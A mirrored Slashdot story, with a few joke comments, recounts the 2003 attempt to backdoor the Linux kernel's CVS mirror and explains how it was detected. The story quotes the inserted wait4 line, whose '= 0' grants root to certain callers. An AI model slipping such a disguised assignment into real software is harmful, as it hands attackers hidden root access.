Slashdot Mirror

← Back to Stories (view on slashdot.org)

The Linux Backdoor Attempt of 2003

Posted by Unknown on from the alright-which-one-of-you-did-it dept.

Hugh Pickens DOT Com writes "Ed Felton writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. But some people didn't like BitKeeper, so a second copy of the source code was kept in CVS. On November 5, 2003, Larry McAvoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in electronically to the CVS server and inserted a small change to wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...' A casual reading makes it look like innocuous error-checking code, but a careful reader would notice that, near the end of the first line, it said '= 0' rather than '== 0' so the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words it's a classic backdoor. We don't know who it was that made the attempt—and we probably never will. But the attempt didn't work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. 'Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack,' writes Felton. 'Unless somebody confesses, or a smoking-gun document turns up, we'll never know.'"

4 of 360 comments (clear)

  1. I did it. by cellocgw · · Score: 2, Funny

    Signed,
    Spartacus

    --
    https://app.box.com/WitthoftResume Code: https://github.com/cellocgw
  2. Re:Repost by squiggleslash · · Score: 5, Funny

    You're forgetting that the NSA is in the news right now, which creates an entirely new angle on it.

    I was able to get a copy of the original submission:

    Ed Felton writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel, a key component of the GNU/Linux operating system. As you know, Apple just released a new operating system called iOS 6. Is it possible that an NSA contractor, paid in Bitcoins raised through an anonymous Kickstarter project to avoid detection, placed an exploit in the new iPhone 5S? And if so, should the government immediately investigate Google who might have used the feature to implement some sort of tracking bug for people using their iPhones in their Teslas?

    --
    You are not alone. This is not normal. None of this is normal.
  3. Re:OMG enough by Russ1642 · · Score: 5, Funny

    There's a 50% chance it was aliens. Either it was aliens, or it wasn't aliens.

  4. Re:NSA (Probably) installed one Anyway by jandrese · · Score: 4, Funny

    I thought SELinux was a clever plan to make security so obnoxious that everybody turns it off and leaves their machines vulnerable to attack.

    --

    I read the internet for the articles.